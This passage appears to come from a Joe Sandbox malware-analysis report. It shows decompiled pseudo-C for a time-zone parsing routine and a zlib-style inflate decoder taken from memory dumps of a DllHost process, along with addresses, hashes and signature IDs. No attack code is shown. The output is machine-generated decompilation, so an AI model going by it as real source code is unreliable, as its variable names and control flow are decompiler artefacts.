				signed long long _t99;
				intOrPtr* _t103;
				char* _t104;
				intOrPtr* _t105;
				intOrPtr* _t106;
				void* _t107;
				intOrPtr* _t108;
				signed char* _t113;
				signed char* _t117;
				signed char* _t125;
				void* _t135;
				void* _t137;
				intOrPtr* _t138;

				_t94 = __rax;
				_a8 = __rbx;
				E00007FF77FF7191ECEC0(_t28);
				_a16 = _a16 & 0x00000000;
				_a24 = _a24 & 0x00000000;
				_t138 = _t94;
				if (E00007FF77FF7191ECF28(_t94,  &_a16) != 0) goto 0x191ed634;
				if (E00007FF77FF7191ECEC8(_t94,  &_a24) != 0) goto 0x191ed634;
				_t113 =  *0x1921bd30; // 0x0
				_t72 = _t113;
				if (_t72 == 0) goto 0x191ed4be;
				r9d = __rcx[_t113 - __rcx] & 0x000000ff;
				if (_t72 != 0) goto 0x191ed4b6;
				_t96 =  &(__rcx[1]);
				if (r9d != 0) goto 0x191ed4a1;
				if (( *__rcx & 0x000000ff) - r9d == 0) goto 0x191ed623;
				E00007FF77FF7191E6B28(_t96, _t113);
				_t99 = __rbx | 0xffffffff;
				if (__rcx[_t99 + 1] != 0) goto 0x191ed4ca;
				E00007FF77FF7191E82BC(_t96, _t99 + 2);
				 *0x1921bd30 = _t96;
				E00007FF77FF7191E6B28(_t96, _t99 + 2);
				_t117 =  *0x1921bd30; // 0x0
				if (_t117 == 0) goto 0x191ed623;
				_t100 = _t99 + 1;
				if (__rcx[_t99 + 1] != 0) goto 0x191ed4f9;
				if (E00007FF77FF7191E4464(_t96, _t117, _t99 + 2, __rcx) != 0) goto 0x191ed634;
				_t12 =  &(_t96[3]); // 0x3
				r13d = _t12;
				r9d = r13d;
				if (E00007FF77FF7191F4418(_t96, _t100,  *_t138, _t99 + 2, __rcx, _t135) != 0) goto 0x191ed634;
				_t80 =  *__rcx;
				if (_t80 == 0) goto 0x191ed544;
				_t125 =  &(__rcx[1]);
				if (_t80 != 0) goto 0x191ed536;
				sil =  *_t125;
				_t103 =  !=  ? _t125 :  &(_t125[1]);
				_t37 = E00007FF77FF7191E4EE0(_t103);
				dil = 0x30;
				_a16 = _t37 * 0xe10;
				if ( *_t103 == 0x2b) goto 0x191ed575;
				if ( *_t103 - dil - 9 > 0) goto 0x191ed57a;
				_t104 = _t103 + 1;
				goto 0x191ed567;
				if ( *_t104 != 0x3a) goto 0x191ed5d8;
				_t105 = _t104 + 1;
				_t40 = E00007FF77FF7191E4EE0(_t105);
				_t41 =  *_t105;
				_a16 = _a16 + _t40 * 0x3c;
				if (_t41 - dil < 0) goto 0x191ed5b1;
				if (_t41 - 0x39 > 0) goto 0x191ed5b1;
				_t106 = _t105 + 1;
				_t43 =  *_t106;
				if (_t43 - dil >= 0) goto 0x191ed59e;
				if (_t43 != 0x3a) goto 0x191ed5d8;
				_t107 = _t106 + 1;
				_t44 = E00007FF77FF7191E4EE0(_t107);
				_t66 = _a16 + _t44;
				_a16 = _t66;
				goto 0x191ed5d1;
				if (_t44 - 0x39 > 0) goto 0x191ed5d8;
				_t108 = _t107 + 1;
				if ( *_t108 - dil >= 0) goto 0x191ed5ca;
				if (sil != 0x2d) goto 0x191ed5e3;
				_a16 =  ~_t66;
				_t92 =  *_t108;
				_a24 = 0 | _t92 != 0x00000000;
				_t97 =  *((intOrPtr*)(_t138 + 8));
				if (_t92 == 0) goto 0x191ed60c;
				if (E00007FF77FF7191F4418(_t97, _t108, _t97, _t99 + 2, _t108, _t137) != 0) goto 0x191ed634;
				goto 0x191ed60f;
				 *_t97 = 0;
				_t49 = E00007FF77FF7191ECEB8(_t48);
				 *_t97 = _a16;
				_t50 = E00007FF77FF7191ECEA8(_t49);
				 *_t97 = _a24;
				return _t50;
			}































                                                                                                                                                              0x7ff7191ed444
                                                                                                                                                              0x7ff7191ed444
                                                                                                                                                              0x7ff7191ed45a
                                                                                                                                                              0x7ff7191ed45f
                                                                                                                                                              0x7ff7191ed467
                                                                                                                                                              0x7ff7191ed46b
                                                                                                                                                              0x7ff7191ed475
                                                                                                                                                              0x7ff7191ed486
                                                                                                                                                              0x7ff7191ed48c
                                                                                                                                                              0x7ff7191ed493
                                                                                                                                                              0x7ff7191ed496
                                                                                                                                                              0x7ff7191ed4a4
                                                                                                                                                              0x7ff7191ed4ac
                                                                                                                                                              0x7ff7191ed4ae
                                                                                                                                                              0x7ff7191ed4b4
                                                                                                                                                              0x7ff7191ed4b8
                                                                                                                                                              0x7ff7191ed4be
                                                                                                                                                              0x7ff7191ed4c3
                                                                                                                                                              0x7ff7191ed4d1
                                                                                                                                                              0x7ff7191ed4d6
                                                                                                                                                              0x7ff7191ed4dd
                                                                                                                                                              0x7ff7191ed4e4
                                                                                                                                                              0x7ff7191ed4e9
                                                                                                                                                              0x7ff7191ed4f3
                                                                                                                                                              0x7ff7191ed4f9
                                                                                                                                                              0x7ff7191ed500
                                                                                                                                                              0x7ff7191ed510
                                                                                                                                                              0x7ff7191ed519
                                                                                                                                                              0x7ff7191ed519
                                                                                                                                                              0x7ff7191ed51d
                                                                                                                                                              0x7ff7191ed530
                                                                                                                                                              0x7ff7191ed536
                                                                                                                                                              0x7ff7191ed539
                                                                                                                                                              0x7ff7191ed53b
                                                                                                                                                              0x7ff7191ed542
                                                                                                                                                              0x7ff7191ed544
                                                                                                                                                              0x7ff7191ed54f
                                                                                                                                                              0x7ff7191ed556
                                                                                                                                                              0x7ff7191ed561
                                                                                                                                                              0x7ff7191ed564
                                                                                                                                                              0x7ff7191ed56a
                                                                                                                                                              0x7ff7191ed573
                                                                                                                                                              0x7ff7191ed575
                                                                                                                                                              0x7ff7191ed578
                                                                                                                                                              0x7ff7191ed57d
                                                                                                                                                              0x7ff7191ed57f
                                                                                                                                                              0x7ff7191ed585
                                                                                                                                                              0x7ff7191ed590
                                                                                                                                                              0x7ff7191ed594
                                                                                                                                                              0x7ff7191ed59a
                                                                                                                                                              0x7ff7191ed5a3
                                                                                                                                                              0x7ff7191ed5a5
                                                                                                                                                              0x7ff7191ed5a8
                                                                                                                                                              0x7ff7191ed5af
                                                                                                                                                              0x7ff7191ed5b3
                                                                                                                                                              0x7ff7191ed5b5
                                                                                                                                                              0x7ff7191ed5bb
                                                                                                                                                              0x7ff7191ed5c3
                                                                                                                                                              0x7ff7191ed5c5
                                                                                                                                                              0x7ff7191ed5c8
                                                                                                                                                              0x7ff7191ed5cc
                                                                                                                                                              0x7ff7191ed5ce
                                                                                                                                                              0x7ff7191ed5d6
                                                                                                                                                              0x7ff7191ed5dc
                                                                                                                                                              0x7ff7191ed5e0
                                                                                                                                                              0x7ff7191ed5e5
                                                                                                                                                              0x7ff7191ed5ea
                                                                                                                                                              0x7ff7191ed5ed
                                                                                                                                                              0x7ff7191ed5f1
                                                                                                                                                              0x7ff7191ed608
                                                                                                                                                              0x7ff7191ed60a
                                                                                                                                                              0x7ff7191ed60c
                                                                                                                                                              0x7ff7191ed612
                                                                                                                                                              0x7ff7191ed617
                                                                                                                                                              0x7ff7191ed61c
                                                                                                                                                              0x7ff7191ed621
                                                                                                                                                              0x7ff7191ed633

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _get_daylight$_invalid_parameter_noinfo$InformationTimeZone
                                                                                                                                                              • String ID: ?$W. Europe Daylight Time$W. Europe Standard Time
                                                                                                                                                              • API String ID: 435049134-1770070496
                                                                                                                                                              • Opcode ID: f609ee9e0991bf70ca8cc0652f8726f3533e77a4b2a598baccb20936b1618f90
                                                                                                                                                              • Instruction ID: b846ec08cc16ccc394ed380aab41149c24b877925f1832782397f2939c4fd7b5
                                                                                                                                                              • Opcode Fuzzy Hash: f609ee9e0991bf70ca8cc0652f8726f3533e77a4b2a598baccb20936b1618f90
                                                                                                                                                              • Instruction Fuzzy Hash: 68D1DA26E08A428BF716BF25E9402B9B7B0AF447ACFC44135EA0D57695DF3CD48B9720
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191CE338 Relevance: 12.0, Strings: 9, Instructions: 730COMMONCrypto
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 64%
                                                                                                                                                              			E00007FF77FF7191CE338(signed int __ebx, void* __edi, void* __ebp, signed int __rax, signed char* __rsi, signed long long __r8, void* __r11, signed long long __r12, void* __r13) {
				signed int _t302;
				signed int _t305;
				unsigned int _t307;
				unsigned int _t311;
				signed int _t327;
				signed int _t329;
				signed int _t336;
				signed char _t341;
				signed int _t354;
				signed char _t359;
				unsigned int _t366;
				void* _t367;
				signed int _t376;
				signed int _t390;
				void* _t398;
				signed int _t399;
				void* _t400;
				signed int _t401;
				void* _t402;
				signed int _t403;
				void* _t404;
				signed int _t406;
				signed int _t407;
				void* _t408;
				signed int _t410;
				signed int _t411;
				void* _t412;
				signed int _t414;
				void* _t415;
				signed int _t416;
				signed int _t417;
				void* _t418;
				signed int _t420;
				void* _t421;
				signed int _t422;
				signed int _t424;
				signed int _t425;
				signed int _t430;
				signed char _t447;
				signed char _t451;
				signed char _t481;
				signed char _t484;
				signed char _t490;
				signed char _t514;
				signed char _t517;
				signed char _t523;
				void* _t525;
				intOrPtr _t526;
				void* _t530;
				signed int _t541;
				signed int _t548;
				signed char _t553;
				void* _t555;
				void* _t559;
				void* _t563;
				signed char _t575;
				signed char _t580;
				intOrPtr _t582;
				void* _t584;
				void* _t585;
				void* _t586;
				void* _t587;
				void* _t588;
				intOrPtr _t589;
				intOrPtr _t590;
				void* _t591;
				void* _t592;
				void* _t593;
				void* _t594;
				void* _t595;
				void* _t596;
				void* _t597;
				void* _t599;
				signed int _t601;
				signed int _t602;
				unsigned int _t603;
				unsigned int _t605;
				unsigned int _t610;
				unsigned int _t613;
				unsigned int _t616;
				signed int _t619;
				unsigned int _t620;
				unsigned int _t623;
				signed int _t625;
				unsigned int _t626;
				signed int _t629;
				unsigned int _t630;
				signed int _t632;
				unsigned int _t633;
				void* _t652;
				void* _t664;
				long long _t738;
				signed long long _t741;
				signed long long _t742;
				long long _t745;
				signed long long _t749;
				signed long long _t751;
				signed long long _t754;
				signed long long _t758;
				signed long long _t759;
				signed long long _t760;
				signed long long _t762;
				signed long long _t763;
				signed long long _t764;
				signed char* _t779;
				signed char* _t780;
				signed char* _t781;
				signed char* _t782;
				signed char* _t783;
				signed char* _t785;
				signed char* _t786;
				signed char* _t787;
				signed char* _t788;
				signed char* _t789;
				signed char* _t790;
				signed char* _t791;
				signed char* _t792;
				void* _t795;
				void* _t797;
				signed long long _t799;
				char* _t804;
				char* _t805;
				long long _t806;
				intOrPtr _t807;
				intOrPtr _t808;
				intOrPtr _t809;
				void* _t810;
				signed long long _t811;
				long long _t816;

				_t811 = __r12;
				_t810 = __r11;
				_t799 = __r8;
				if (__ebx - 0xe >= 0) goto 0x191ce35e;
				if (__edi == 0) goto 0x191ce19f;
				_t584 = __edi - 1;
				_t601 = __ebp + (( *__rsi & 0x000000ff) << __ebx);
				_t779 =  &(__rsi[1]);
				_t398 = __ebx + 8;
				if (_t398 - 0xe < 0) goto 0x191ce340;
				_t399 = _t398 + 0xfffffff2;
				_t602 = _t601 >> 5;
				_t430 = (_t601 & 0x0000001f) + 0x101;
				_t603 = _t602 >> 5;
				 *(__r13 + 0x7c) = _t430;
				_t548 = (_t602 & 0x0000001f) + 1;
				 *(__r13 + 0x80) = _t548;
				 *((intOrPtr*)(__r13 + 0x78)) = (_t603 & 0x0000000f) + 4;
				if (_t430 - 0x11e > 0) goto 0x191ce4c0;
				if (_t548 - 0x1e > 0) goto 0x191ce4c0;
				 *(__r13 + 0x84) = r15d;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f45;
				if ( *(__r13 + 0x84) -  *((intOrPtr*)(__r13 + 0x78)) >= 0) goto 0x191ce428;
				if (_t399 - 3 >= 0) goto 0x191ce3ee;
				if (_t584 == 0) goto 0x191ce19f;
				_t585 = _t584 - 1;
				_t605 = (_t603 >> 4) + (( *_t779 & 0x000000ff) << _t399);
				_t780 =  &(_t779[1]);
				_t400 = _t399 + 8;
				if (_t400 - 3 < 0) goto 0x191ce3d0;
				_t401 = _t400 + 0xfffffffd;
				 *(__r13 + 0x90 + __rax * 2) = _t605 & 7;
				 *(__r13 + 0x84) =  *(__r13 + 0x84) + 1;
				_t302 =  *(__r13 + 0x84);
				if (_t302 -  *((intOrPtr*)(__r13 + 0x78)) < 0) goto 0x191ce3c4;
				if (_t302 - 0x13 >= 0) goto 0x191ce45a;
				 *(__r13 + 0x90 + __rax * 2) = r15w;
				 *(__r13 + 0x84) =  *(__r13 + 0x84) + 1;
				if ( *(__r13 + 0x84) - 0x13 < 0) goto 0x191ce430;
				_t758 = __r13 + 0x70;
				_t738 = __r13 + 0x550;
				 *_t758 = 7;
				 *((long long*)(__r13 + 0x60)) = _t738;
				 *((long long*)(__r13 + 0x88)) = _t738;
				 *((long long*)(_t797 + 0x28)) = __r13 + 0x310;
				 *(_t797 + 0x20) = _t758;
				_t37 = _t758 + 0x13; // 0x13
				r8d = _t37;
				_t305 = E00007FF77FF7191CFB00(0, __r13 + 0x90, _t795, __r13 + 0x88, __r12);
				 *(_t797 + 0xb0) = _t305;
				if (_t305 == 0) goto 0x191ce4d9;
				 *(_t811 + 0x20) = "invalid code lengths set";
				 *((intOrPtr*)(__r13 + 8)) = 0x3f51;
				goto 0x191cdff4;
				_t741 = "too many length or distance symbols";
				 *(_t811 + 0x20) = _t741;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f51;
				goto 0x191ce001;
				 *(__r13 + 0x84) = r15d;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f46;
				r10d =  *(__r13 + 0x7c);
				if ( *(__r13 + 0x84) -  *(__r13 + 0x80) + r10d >= 0) goto 0x191ce702;
				r9d = 1;
				_t807 =  *((intOrPtr*)(__r13 + 0x60));
				r9d = r9d <<  *(__r13 + 0x70);
				r9d = r9d - 1;
				_t759 = _t758 & _t741;
				_t307 =  *(_t807 + _t759 * 4);
				r8d = _t307;
				r8d = r8d >> 0x10;
				 *(_t797 + 0x34) = _t307;
				if ((_t307 >> 0x00000008 & 0x000000ff) - _t401 <= 0) goto 0x191ce583;
				if (_t585 == 0) goto 0x191ce19f;
				_t586 = _t585 - 1;
				_t781 =  &(_t780[1]);
				_t402 = _t401 + 8;
				_t742 = _t741 & _t759;
				_t311 =  *(_t807 + _t742 * 4);
				_t553 = _t311 >> 8;
				r8d = _t311;
				r8d = r8d >> 0x10;
				 *(_t797 + 0x34) = _t311;
				if ((_t553 & 0x000000ff) - _t402 > 0) goto 0x191ce547;
				_t652 = r8w - 0x10;
				if (_t652 >= 0) goto 0x191ce5ba;
				_t403 = _t402 - (_t553 & 0x000000ff);
				 *((short*)(__r13 + 0x90 + _t759 * 2)) = _t311 >> 0x10;
				 *(__r13 + 0x84) =  *(__r13 + 0x84) + 1;
				r8d =  *(__r13 + 0x84);
				goto 0x191ce6e7;
				if (_t652 != 0) goto 0x191ce619;
				_t555 = (_t553 & 0x000000ff) + 2;
				if (_t403 - _t555 >= 0) goto 0x191ce5e3;
				if (_t586 == 0) goto 0x191ce19f;
				_t587 = _t586 - 1;
				_t782 =  &(_t781[1]);
				_t404 = _t403 + 8;
				if (_t404 - _t555 < 0) goto 0x191ce5c6;
				_t447 =  *(_t797 + 0x35) & 0x000000ff;
				_t610 = ((_t605 >> 3) + (( *_t780 & 0x000000ff) << _t401) >> (_t553 & 0x000000ff)) + (( *_t781 & 0x000000ff) << _t403) >> _t447;
				if ( *(__r13 + 0x84) == 0) goto 0x191ce732;
				_t406 = _t404 - _t447 + 0xfffffffe;
				r9d =  *(__r13 + 0x90 + _t742 * 2) & 0x0000ffff;
				goto 0x191ce6a3;
				if (r8w != 0x11) goto 0x191ce660;
				_t559 = (_t610 & 0x00000003) + 6;
				if (_t406 - _t559 >= 0) goto 0x191ce644;
				if (_t587 == 0) goto 0x191ce19f;
				_t588 = _t587 - 1;
				_t783 =  &(_t782[1]);
				_t407 = _t406 + 8;
				if (_t407 - _t559 < 0) goto 0x191ce627;
				_t613 = (_t610 >> 2) + (( *_t782 & 0x000000ff) << _t406) >> ( *(_t797 + 0x35) & 0x000000ff);
				r9d = r15d;
				goto 0x191ce69f;
				_t563 = (_t613 & 0x00000007) + 0xa;
				if (_t407 - _t563 >= 0) goto 0x191ce684;
				if (_t588 == 0) goto 0x191ce19f;
				_t589 = _t588 - 1;
				_t408 = _t407 + 8;
				if (_t408 - _t563 < 0) goto 0x191ce667;
				_t451 =  *(_t797 + 0x35) & 0x000000ff;
				_t616 = (_t613 >> 3) + (( *_t783 & 0x000000ff) << _t407) >> _t451;
				r9d = r15w & 0xffffffff;
				_t664 =  *(__r13 + 0x84) + (_t616 & 0x0000007f) + 0xb -  *(__r13 + 0x80) +  *(__r13 + 0x7c);
				if (_t664 > 0) goto 0x191ce732;
				 *(__r13 + 0x90 + _t742 * 2) = r9w;
				r8d =  *(__r13 + 0x84);
				r8d = __r8 + 1;
				 *(__r13 + 0x84) = r8d;
				if (_t664 != 0) goto 0x191ce6c0;
				r10d =  *(__r13 + 0x7c);
				if (r8d -  *(__r13 + 0x80) + r10d < 0) goto 0x191ce510;
				if ( *((intOrPtr*)(__r13 + 8)) == 0x3f51) goto 0x191cdff4;
				if ( *((short*)(__r13 + 0x290)) != 0) goto 0x191ce74b;
				 *(_t811 + 0x20) = "invalid code -- missing end-of-block";
				 *((intOrPtr*)(__r13 + 8)) = 0x3f51;
				goto 0x191cdff4;
				 *(_t811 + 0x20) = "invalid bit length repeat";
				 *((intOrPtr*)(__r13 + 8)) = 0x3f51;
				goto 0x191cdff4;
				_t745 = __r13 + 0x550;
				 *(__r13 + 0x70) = 9;
				 *((long long*)(__r13 + 0x88)) = _t745;
				_t816 = __r13 + 0x310;
				 *((long long*)(__r13 + 0x60)) = _t745;
				 *((long long*)(_t797 + 0x28)) = _t816;
				 *(_t797 + 0x20) = __r13 + 0x70;
				r8d = r10d;
				_t327 = E00007FF77FF7191CFB00(1, __r13 + 0x90, _t795, __r13 + 0x88, _t811);
				 *(_t797 + 0xb0) = _t327;
				if (_t327 == 0) goto 0x191ce7b9;
				 *(_t811 + 0x20) = "invalid literal/lengths set";
				 *((intOrPtr*)(__r13 + 8)) = 0x3f51;
				goto 0x191cdff4;
				_t748 =  *((intOrPtr*)(__r13 + 0x88));
				_t760 = __r13 + 0x74;
				r8d =  *(__r13 + 0x80);
				 *((long long*)(__r13 + 0x68)) =  *((intOrPtr*)(__r13 + 0x88));
				 *_t760 = 6;
				 *((long long*)(_t797 + 0x28)) = _t816;
				 *(_t797 + 0x20) = _t760;
				_t329 = E00007FF77FF7191CFB00(2, 0x90 + _t748 * 2 + __r13, _t795, __r13 + 0x88, _t811);
				 *(_t797 + 0xb0) = _t329;
				r15d = _t329;
				if (_t329 == 0) goto 0x191ce826;
				_t749 = "invalid distances set";
				 *(_t811 + 0x20) = _t749;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f51;
				goto 0x191cdff4;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f47;
				if ( *((intOrPtr*)(_t797 + 0xa8)) == 6) goto 0x191cef24;
				r8d =  *(_t797 + 0xa0);
				r15d = 0;
				r10d =  *(_t797 + 0xb8);
				 *((intOrPtr*)(__r13 + 8)) = 0x3f48;
				if (_t589 - 6 < 0) goto 0x191ce8d8;
				if (r10d - 0x102 < 0) goto 0x191ce8d8;
				 *((long long*)(_t811 + 0x10)) =  *((intOrPtr*)(_t797 + 0x40));
				_t762 = _t811;
				 *(_t811 + 0x18) = r10d;
				 *_t811 =  &(_t783[1]);
				 *((intOrPtr*)(_t811 + 8)) = _t589;
				 *(__r13 + 0x48) = _t616 >> 7;
				 *(__r13 + 0x4c) = _t408 + 0xfffffff9 - _t451;
				E00007FF77FF7191D00C0(r8d, _t599, _t749, _t762, _t807, _t810);
				r10d =  *(_t811 + 0x18);
				_t785 =  *_t811;
				_t590 =  *((intOrPtr*)(_t811 + 8));
				_t410 =  *(__r13 + 0x4c);
				 *((long long*)(_t797 + 0x40)) =  *((intOrPtr*)(_t811 + 0x10));
				 *(_t797 + 0xb8) = r10d;
				if ( *((intOrPtr*)(__r13 + 8)) != 0x3f3f) goto 0x191ce001;
				 *(__r13 + 0x1be4) = 0xffffffff;
				goto 0x191ce001;
				_t808 =  *((intOrPtr*)(__r13 + 0x60));
				_t763 = _t762 & _t749;
				 *(__r13 + 0x1be4) = r15d;
				if (( *(_t808 + _t763 * 4) >> 0x00000008 & 0x000000ff) - _t410 <= 0) goto 0x191ce937;
				if (_t590 == 0) goto 0x191ce19f;
				_t591 = _t590 - 1;
				_t619 =  *(__r13 + 0x48) + (( *_t785 & 0x000000ff) << _t410);
				_t786 =  &(_t785[1]);
				_t411 = _t410 + 8;
				_t336 =  *(_t808 + (_t749 & _t763) * 4);
				if ((_t336 >> 0x00000008 & 0x000000ff) - _t411 > 0) goto 0x191ce907;
				if (_t336 == 0) goto 0x191ce9f3;
				if ((_t336 & 0x000000f0) != 0) goto 0x191ce9f3;
				 *(_t797 + 0x34) = _t336;
				r14d =  *(_t797 + 0x35) & 0x000000ff;
				r8d = 1;
				r9d = _t336 >> 0x00000008 & 0x000000ff;
				r8d = r8d << (_t336 & 0x000000ff) + r9d;
				r8d = r8d - 1;
				r8d = r8d & _t619;
				r8d = r8d >> r9d;
				r8d = r8d + (_t336 >> 0x10);
				r8d =  *(_t808 + _t799 * 4) >> 0x00000008 & 0x000000ff;
				r8d = r8d + r9d;
				if (r8d - _t411 <= 0) goto 0x191ce9e4;
				r11d =  *(_t797 + 0x36) & 0x0000ffff;
				if (_t591 == 0) goto 0x191ce19f;
				r8d = 1;
				_t620 = _t619 + (( *_t786 & 0x000000ff) << _t411);
				_t592 = _t591 - 1;
				r8d = r8d << (_t336 & 0x000000ff) + r14d;
				_t787 =  &(_t786[1]);
				r8d = r8d - 1;
				r8d = r8d & _t620;
				_t412 = _t411 + 8;
				r8d = r8d >> r14d;
				r8d = r8d + r11d;
				_t341 =  *(_t808 + _t799 * 4);
				r8d = _t341 >> 0x00000008 & 0x000000ff;
				r8d = r8d + r14d;
				if (r8d - _t412 > 0) goto 0x191ce998;
				_t481 = r14d;
				 *(__r13 + 0x1be4) = _t481;
				_t484 = _t341 >> 0x00000008 & 0x000000ff;
				 *(__r13 + 0x1be4) =  *(__r13 + 0x1be4) + _t484;
				_t414 = _t412 - r14d - _t484;
				 *(__r13 + 0x50) = _t341 >> 0x10;
				if (_t341 != 0) goto 0x191cea20;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f4d;
				goto 0x191cdff4;
				if ((_t341 & 0x00000020) == 0) goto 0x191cea34;
				 *(__r13 + 0x1be4) = 0xffffffff;
				goto 0x191cdfec;
				if ((_t341 & 0x00000040) == 0) goto 0x191cea51;
				_t751 = "invalid literal/length code";
				 *(_t811 + 0x20) = _t751;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f51;
				goto 0x191cdff4;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f49;
				 *(__r13 + 0x58) = _t341 & 0xf;
				_t575 =  *(__r13 + 0x58);
				if (_t575 == 0) goto 0x191ceaa9;
				if (_t414 - _t575 >= 0) goto 0x191cea8d;
				if (_t592 == 0) goto 0x191ce19f;
				_t593 = _t592 - 1;
				_t623 = (_t620 >> _t481 >> _t484) + (( *_t787 & 0x000000ff) << _t414);
				_t788 =  &(_t787[1]);
				_t415 = _t414 + 8;
				if (_t415 - _t575 < 0) goto 0x191cea70;
				_t490 = _t575;
				_t416 = _t415 - _t575;
				 *(__r13 + 0x50) =  *(__r13 + 0x50) + ((0x00000001 << _t490) - 0x00000001 & _t623);
				 *(__r13 + 0x1be4) =  *(__r13 + 0x1be4) + _t575;
				 *(__r13 + 0x1be8) =  *(__r13 + 0x50);
				 *((intOrPtr*)(__r13 + 8)) = 0x3f4a;
				_t809 =  *((intOrPtr*)(__r13 + 0x68));
				_t764 = _t763 & _t751;
				if (( *(_t809 + _t764 * 4) >> 0x00000008 & 0x000000ff) - _t416 <= 0) goto 0x191ceb14;
				if (_t593 == 0) goto 0x191ce19f;
				_t594 = _t593 - 1;
				_t625 = (_t623 >> _t490) + (( *_t788 & 0x000000ff) << _t416);
				_t789 =  &(_t788[1]);
				_t417 = _t416 + 8;
				_t354 =  *(_t809 + (_t751 & _t764) * 4);
				if ((_t354 >> 0x00000008 & 0x000000ff) - _t417 > 0) goto 0x191ceae4;
				if ((_t354 & 0x000000f0) != 0) goto 0x191cebcb;
				 *(_t797 + 0x34) = _t354;
				r14d =  *(_t797 + 0x35) & 0x000000ff;
				r8d = 1;
				r9d = _t354 >> 0x00000008 & 0x000000ff;
				r8d = r8d << (_t354 & 0x000000ff) + r9d;
				r8d = r8d - 1;
				r8d = r8d & _t625;
				r8d = r8d >> r9d;
				r8d = r8d + (_t354 >> 0x10);
				r8d =  *(_t809 + _t799 * 4) >> 0x00000008 & 0x000000ff;
				r8d = r8d + r9d;
				if (r8d - _t417 <= 0) goto 0x191cebbc;
				r11d =  *(_t797 + 0x36) & 0x0000ffff;
				if (_t594 == 0) goto 0x191ce19f;
				r8d = 1;
				_t626 = _t625 + (( *_t789 & 0x000000ff) << _t417);
				_t595 = _t594 - 1;
				r8d = r8d << (_t354 & 0x000000ff) + r14d;
				_t790 =  &(_t789[1]);
				r8d = r8d - 1;
				r8d = r8d & _t626;
				_t418 = _t417 + 8;
				r8d = r8d >> r14d;
				r8d = r8d + r11d;
				_t359 =  *(_t809 + _t799 * 4);
				r8d = _t359 >> 0x00000008 & 0x000000ff;
				r8d = r8d + r14d;
				if (r8d - _t418 > 0) goto 0x191ceb70;
				_t514 = r14d;
				 *(__r13 + 0x1be4) =  *(__r13 + 0x1be4) + _t514;
				r10d =  *(_t797 + 0xb8);
				_t517 = _t359 >> 0x00000008 & 0x000000ff;
				 *(__r13 + 0x1be4) =  *(__r13 + 0x1be4) + _t517;
				_t420 = _t418 - r14d - _t517;
				if ((_t359 & 0x00000040) == 0) goto 0x191cec03;
				 *(_t811 + 0x20) = "invalid distance code";
				 *((intOrPtr*)(__r13 + 8)) = 0x3f51;
				goto 0x191cdffc;
				r8d =  *(_t797 + 0xa0);
				 *(__r13 + 0x54) = _t359 >> 0x10;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f4b;
				 *(__r13 + 0x58) = _t359 & 0xf;
				_t580 =  *(__r13 + 0x58);
				if (_t580 == 0) goto 0x191cec6b;
				if (_t420 - _t580 >= 0) goto 0x191cec4f;
				if (_t595 == 0) goto 0x191ce19f;
				_t596 = _t595 - 1;
				_t629 = (_t626 >> _t514 >> _t517) + (( *_t790 & 0x000000ff) << _t420);
				_t791 =  &(_t790[1]);
				_t421 = _t420 + 8;
				if (_t421 - _t580 < 0) goto 0x191cec32;
				_t523 = _t580;
				_t422 = _t421 - _t580;
				_t630 = _t629 >> _t523;
				 *(__r13 + 0x54) =  *(__r13 + 0x54) + ((0x00000001 << _t523) - 0x00000001 & _t629);
				 *(__r13 + 0x1be4) =  *(__r13 + 0x1be4) + _t580;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f4c;
				if (r10d == 0) goto 0x191ce19f;
				_t366 =  *(__r13 + 0x54);
				_t525 = r8d - r10d;
				if (_t366 - _t525 <= 0) goto 0x191cecdb;
				_t367 = _t366 - _t525;
				if (_t367 -  *((intOrPtr*)(__r13 + 0x38)) <= 0) goto 0x191cecb5;
				if ( *((intOrPtr*)(__r13 + 0x1be0)) == 0) goto 0x191cecb5;
				_t754 = "invalid distance too far back";
				 *(_t811 + 0x20) = _t754;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f51;
				goto 0x191cdffc;
				_t526 =  *((intOrPtr*)(__r13 + 0x3c));
				if (_t367 - _t526 <= 0) goto 0x191cecc3;
				r8d =  *(__r13 + 0x50);
				r9d = r8d;
				r9d =  <=  ? _t367 - _t526 : r9d;
				goto 0x191cecea;
				r8d =  *(__r13 + 0x50);
				r9d = r8d;
				_t530 =  <=  ? r9d : r10d;
				_t804 =  *((intOrPtr*)(_t797 + 0x40));
				r10d = r10d - _t530;
				r8d = r8d - _t530;
				 *(_t797 + 0xb8) = r10d;
				 *(__r13 + 0x50) = r8d;
				 *_t804 =  *( *((intOrPtr*)(_t797 + 0x40)) - _t754 - _t804 + _t804) & 0x000000ff;
				_t805 = _t804 + 1;
				if (r9d != r10d) goto 0x191ced10;
				 *((long long*)(_t797 + 0x40)) = _t805;
				if ( *(__r13 + 0x50) != _t530 + 0xffffffff) goto 0x191ce001;
				 *((intOrPtr*)(__r13 + 8)) = 0x3f48;
				if (r10d == 0) goto 0x191ce19f;
				 *_t805 =  *(__r13 + 0x50) & 0x000000ff;
				_t806 = _t805 + 1;
				r10d = r10d - 1;
				 *((long long*)(_t797 + 0x40)) = _t806;
